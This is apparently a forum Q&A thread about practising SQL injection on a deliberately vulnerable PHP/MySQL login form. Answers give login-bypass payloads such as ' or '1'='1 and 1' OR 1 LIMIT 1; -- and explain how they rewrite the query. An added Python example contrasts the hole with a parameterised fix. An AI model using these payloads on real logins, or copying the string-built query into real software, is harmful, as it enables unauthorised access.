
I want to try a PHP/MySQL injection with a login example; my code is below.

I have tried with a username of anything' -- and an empty password, but it doesn't work and I couldn't log in.

Could anyone help me?

<?php
mysql_connect('localhost','root','root');
mysql_select_db('hp');
?>

<form action="" method="post">
<table width="50%">
    <tr>
        <td>User</td>
        <td><input type="text" name="user"></td>
    </tr>
    <tr>
        <td></td>
        <td><input type="text" name="password"></td>
    </tr>
</table>
    <input type="submit" value="OK" name="s">
</form>

<?php
if($_POST['s']){
    $user = $_POST['user'];
    $pass = $_POST['password'];     
    $re = mysql_query("select * from zend_adminlist where user_name = '$user' and password = '$pass'");

    if(mysql_num_rows($re) == 0){       
        echo '0';
    }else{
        echo '1';
    }
}
?>

2 Answers

One of the most common examples is this query:

' or '1'='1

If you enter this as the username and password into some unsanitized login input the query changes like so:

Original: SELECT * FROM USERS WHERE USER='' AND PASS='';
Modified: SELECT * FROM USERS WHERE USER='' or '1'='1' AND PASS='' or '1'='1';

This causes each thing it's looking for to be true, as 1 will always equal 1. The problem with this method is that it does not allow the selection of a particular user. To do so, you need to make it ignore the AND statement by commenting it out, as seen in other examples.


1 Comment

I mostly try # after the query, like 1' OR 1=1#, so the code after that is commented out. Someone can also use --
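To see why the query above changes shape, here is an added example (not from the question or either answer) that re-creates the question's login check in Python against an in-memory SQLite stand-in for the zend_adminlist table, and puts the string-spliced query beside a parameterised one. The table contents and the helper names are constructed for this demonstration.

```python
import sqlite3

# Constructed stand-in for the question's zend_adminlist table.
# Plain-text passwords only mirror the question's schema; a real
# application would store a password hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zend_adminlist (user_name TEXT, password TEXT)")
    conn.execute("INSERT INTO zend_adminlist VALUES ('admin', 's3cret')")
    return conn

def vulnerable_login(conn, user, pw):
    # Same shape as the mysql_query() call in the question: untrusted
    # input is spliced straight into the SQL text, so a quote in the
    # input becomes part of the statement.
    sql = ("SELECT * FROM zend_adminlist WHERE user_name = '%s' "
           "AND password = '%s'" % (user, pw))
    return len(conn.execute(sql).fetchall()) > 0

def safe_login(conn, user, pw):
    # Parameterised query: the values travel separately from the SQL
    # text, so they are always compared as data, never parsed as SQL.
    sql = ("SELECT * FROM zend_adminlist WHERE user_name = ? "
           "AND password = ?")
    return len(conn.execute(sql, (user, pw)).fetchall()) > 0

def demo():
    conn = make_db()
    payload = "' or '1'='1"   # the input discussed in the answer above
    return {
        "vuln_real": vulnerable_login(conn, "admin", "s3cret"),
        "vuln_payload": vulnerable_login(conn, payload, payload),
        "safe_real": safe_login(conn, "admin", "s3cret"),
        "safe_payload": safe_login(conn, payload, payload),
    }

if __name__ == "__main__":
    print(demo())
```

The spliced version reports a successful login for the quoted input even though no such user exists; the parameterised version only matches the real credentials.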

If the value of username is:

 $_POST['user'] = "1' OR 1 LIMIT 1; --";

Then the MySQL query becomes:

select * 
from zend_adminlist 
where user_name = '1' OR 1 LIMIT 1; --' and password = '$pass'

3 Comments

Doesn't MySQL only allow 1 line per query?
1 line, it is true, but one line means one query delimiter: ; The -- means that the code after it is commented out. So actually the upper query is one query. I just broke the lines to make the code readable.
I use # instead of -- most of the time.
